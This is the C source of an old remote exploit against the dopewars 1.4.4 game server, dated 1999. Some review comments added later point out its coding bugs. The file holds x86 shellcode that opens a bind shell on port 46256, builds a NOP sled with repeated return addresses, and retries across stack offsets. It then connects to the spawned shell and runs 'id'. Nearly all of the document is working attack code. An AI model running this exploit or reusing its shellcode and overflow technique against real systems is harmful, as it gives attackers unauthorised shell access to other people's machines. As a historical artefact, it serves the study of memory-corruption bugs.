dopewars 1.4.4 exploit; it has been fixed now (thanks to my patch :-) ). It dates back to October 1999, but I used some cool methods in it.
f7b77db072d1405a450204a66ded9b44f5d8fe5c91b142d9376c984870b4f68f
/* PRIVATE Do NOT Distribute PRIVATE */
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
/*
* Dopewars by Ben Webb (Version 1.4.4 maybe older ones too).
* This exploit will cause a shell to be created on port 46256.
* The bug is located inside the ProcessMessage() and ExtractWordDelim()
* functions.
*
* I already sent a patch to Ben Webb and he'll add it in the next release.
*
* Date: October 1999
* Lamagra <access-granted@geocities.com>
*/
/*
 * Payload bytes appended by do_expl(); the file header above states the
 * result is a shell listening on port 46256.  The rest of this file treats
 * it as an opaque C string (it is copied with a "%s" in sprintf, so it must
 * not contain a 0x00 byte).
 */
char hellshell[]=
"\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
"\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
"\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
"\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
"\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
"\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
"\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
"\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
"\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
"\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
"\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
"\xd2\x89\x55\xe4\xcd\x80";
/* Two-byte sequence that do_expl() places right after the run of 0x90 bytes. */
char jmpcode[]="\xeb\x0d";
/* Forward declarations for the helpers defined below main(). */
int shell(unsigned long);
void transfer(char *, int);
void do_expl(int,int,long);
unsigned long resolve(char *);
/*
 * Entry point.  The mode is chosen by argv[1]:
 *   "-b"      bind to port 7902 and wait for a single incoming client
 *   hostname  connect to hostname:7902, retrying up to 20 times with a
 *             growing offset
 * argv[2], when present, is either an absolute address ("0x..." prefix,
 * parsed with strtoul) or a decimal offset (atoi) added to the default.
 * Declared with no return type (implicit int), which pre-C99 compilers
 * accepted; modern compilers reject or warn on it.
 */
main(int argc, char **argv)
{
/* `time` is a plain loop counter here, unrelated to time(2). */
int time,offset=0,client,fd;
/* Neither sockaddr_in is zeroed before use; only sin_zero of `addr` is
 * cleared, and only after a failed connect() (see the retry loop). */
struct sockaddr_in addr, clientaddr;
/* Default address; replaced wholesale by a 0x-prefixed argv[2]. */
long eip = 0xbffff620;
if(argc < 2)
{
printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]);
exit(-1);
}
if(argc > 2)
{
/* "0x" prefix -> absolute address via strtoul(base 0); anything else
 * is a decimal offset.  Neither conversion reports parse errors. */
if(!strncmp(argv[2],"0x",2)) eip = strtoul(argv[2],0,0);
else offset = atoi(argv[2]);
}
/* NOTE(review): socket() result is not checked; -1 would be used as a fd. */
fd = socket(AF_INET,SOCK_STREAM,0);
addr.sin_family = AF_INET;
addr.sin_port = htons(7902);
/* strcmp() != 0 means argv[1] is not "-b", i.e. a host name to connect to. */
if(strcmp(argv[1],"-b"))
{
/* resolve() exits the process if the name cannot be resolved. */
addr.sin_addr.s_addr = resolve(argv[1]);
for(time = 0;time < 20;time++)
{
/* Connect to server */
/* sizeof(struct sockaddr) (16) matches sizeof(struct sockaddr_in) on the
 * usual platforms; the same fd is reused for every connect() attempt. */
while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
{
perror("can't connect to server");
/* NOTE(review): the fill value is NULL (a pointer constant) where the
 * int 0 is meant; it works only because NULL is 0 here. */
memset(addr.sin_zero,NULL,sizeof(addr.sin_zero));
sleep(20);
}
do_expl(fd,offset,eip);
sleep(1);
/* shell() returns -1 when its connect() fails; the value is ignored and
 * the loop simply moves on to the next offset. */
shell(addr.sin_addr.s_addr);
offset += 100; /* increase offset and try again */
}
}
else{
/* bind to 7902 and wait for a client */
addr.sin_addr.s_addr = INADDR_ANY;
/* Address length is the literal 16 rather than sizeof addr. */
if(bind(fd,(struct sockaddr *)&addr,16) == -1)
{
perror("bind");
exit(-1);
}
/* listen() return value is not checked. */
listen(fd,5);
bzero((char*)&clientaddr,sizeof(struct sockaddr_in));
/* NOTE(review): accept()'s third argument must be a pointer to a socklen_t
 * holding the buffer size; the literal 16 is passed as that pointer.  The
 * second argument also lacks the (struct sockaddr *) cast used elsewhere. */
client = accept(fd,&clientaddr,16);
do_expl(client,offset,eip);
sleep(1);
shell(clientaddr.sin_addr.s_addr);
}
/* Only the listening/connecting fd is closed; `client` never is.  In
 * connect mode this line is often unreachable, because shell() calls
 * exit(-1) on EOF instead of returning. */
close(fd);
}
/*
 * Build the message for one attempt and write it to fd.
 *
 * fd:     connected socket to write to
 * offset: added to addy; adjusted locally by the zero-byte check below
 * addy:   base address (see main())
 *
 * The message is three '^'-separated fields ("%s^%s^%s\n"): the nops
 * buffer twice, then hellshell.  The '^' delimiter presumably matches the
 * ExtractWordDelim() parsing named in the file header — verify against
 * the dopewars source.  The write() return value is not checked.
 */
void do_expl(int fd,int offset, long addy)
{
char buf[1024],*sploit;
/* 213 bytes: 200 filler/jmpcode bytes, then 12 bytes of address.  The
 * remaining byte is never written, so nothing here NUL-terminates nops
 * before it is used with "%s" below (see NOTE further down). */
char nops[213];
int x;
long *addr_ptr;
/* check eip for 0x0 */
/* `+` binds tighter than `&`, so each test masks (addy+offset).  A zero
 * byte bumps offset by one, but the sum is not re-checked afterwards. */
if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) || !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000))
{
printf("NULL detected in address\n");
offset += 1;
}
sploit = nops;
/* 200 - strlen(jmpcode) = 198 bytes of 0x90, then the 2 jmpcode bytes,
 * filling nops[0..199].  `x` is int and strlen() returns size_t, so the
 * comparison is done unsigned. */
for(x = 0;x < 200 - strlen(jmpcode);x++)
*(sploit++) = 0x90;
for(x = 0;x < strlen(jmpcode);x++)
*(sploit++) = jmpcode[x];
/* %x with a long argument: works where long is 32 bits, UB otherwise. */
printf("Using address: 0x%x\n",addy+offset);
/* Post-increment: addr_ptr starts at nops[200]; sploit is not used again. */
addr_ptr = (long *)(sploit++);
/* Three longs are stored (x = 0, 4, 8).  With a 32-bit long that is
 * nops[200..211]; with a 64-bit long it is 24 bytes and overruns nops. */
for(x = 0; x < 12;x+=4)
*(addr_ptr++) = addy + offset;
/* NOTE(review): nops[212] is never assigned, so "%s" keeps reading past the
 * written bytes until it happens to hit a zero on the stack.  buf is
 * 1024 bytes; the intended content (2*212 + 2 + sizeof hellshell) fits,
 * but only if nops terminates promptly. */
sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell);
write(fd,buf,strlen(buf));
}
/*
 * Connect to addy:46256 and relay stdin to the socket and the socket to
 * stdout until the peer closes.
 *
 * addy: IPv4 address in network byte order (as returned by resolve()).
 * Returns -1 if connect() fails.  On EOF or read error it calls exit(-1),
 * so it never returns 0 to the caller.
 */
int shell(unsigned long addy)
{
char buf[1024];
/* NOTE(review): `set` is never initialised with FD_ZERO, and select()
 * rewrites it on return, so stale bits carry over between iterations. */
fd_set set;
int len,sockfd;
/* Only the three fields below are set; the rest of addr is uninitialised. */
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(46256);
addr.sin_addr.s_addr = addy;
/* socket() result is not checked. */
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
{
perror("Sploit failed, connect");
close(sockfd);
return -1;
}
/* First line sent to the peer once connected; write() result unchecked. */
strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n");
write(sockfd,buf,strlen(buf));
while(1)
{
FD_SET(fileno(stdin),&set);
FD_SET(sockfd,&set);
/* select() return value (error / -1) is not checked. */
select(sockfd+1,&set,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&set))
{
/* Fill value is NULL (pointer constant) where int 0 is meant. */
memset(buf,NULL,1024);
/* NOTE(review): on stdin EOF fgets() returns NULL and buf stays empty;
 * stdin remains readable, so this branch then spins with 0-byte writes. */
fgets(buf,1024,stdin);
write(sockfd,buf,strlen(buf));
}
if(FD_ISSET(sockfd,&set))
{
memset(buf,NULL,1024);
/* A full 1024-byte read leaves no terminator for puts() below. */
if((len = read(sockfd,buf,1024)) == 0)
{
printf("EOF.\n");
close(sockfd);
exit(-1);
}
if(len == -1)
{
perror("read");
exit(-1);
}
puts(buf);
}
}
}
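/*
 * Resolve a dotted-quad string or a host name to an IPv4 address.
 *
 * name: "a.b.c.d" literal or a host name looked up with gethostbyname().
 * Returns the 32-bit address in network byte order, widened to unsigned
 * long.  A name that cannot be resolved prints a message and terminates
 * the process with exit(-1), as the original did.
 *
 * The original compared an unsigned long against -1, which only matches
 * inet_addr()'s failure value (INADDR_NONE, 0xffffffff) where long is 32
 * bits; it also copied 4 bytes into the low part of an unsigned long and
 * relied on the BSD-only h_addr macro.  All three are fixed here.
 */
unsigned long resolve(char *name)
{
    struct in_addr ia;

    /* inet_addr() reports failure as INADDR_NONE; compare in_addr_t to
     * in_addr_t so the test is independent of sizeof(long). */
    ia.s_addr = inet_addr(name);
    if (ia.s_addr == INADDR_NONE) {
        struct hostent *hp = gethostbyname(name);

        /* h_addr_list[0] is the portable spelling of h_addr.  Only accept
         * an IPv4 entry of the expected length before copying 4 bytes. */
        if (hp == NULL || hp->h_addrtype != AF_INET ||
            hp->h_length != (int)sizeof ia.s_addr) {
            printf("Unable to resolve <%s>\n", name);
            exit(-1);
        }
        memcpy(&ia.s_addr, hp->h_addr_list[0], sizeof ia.s_addr);
    }
    return ia.s_addr;
}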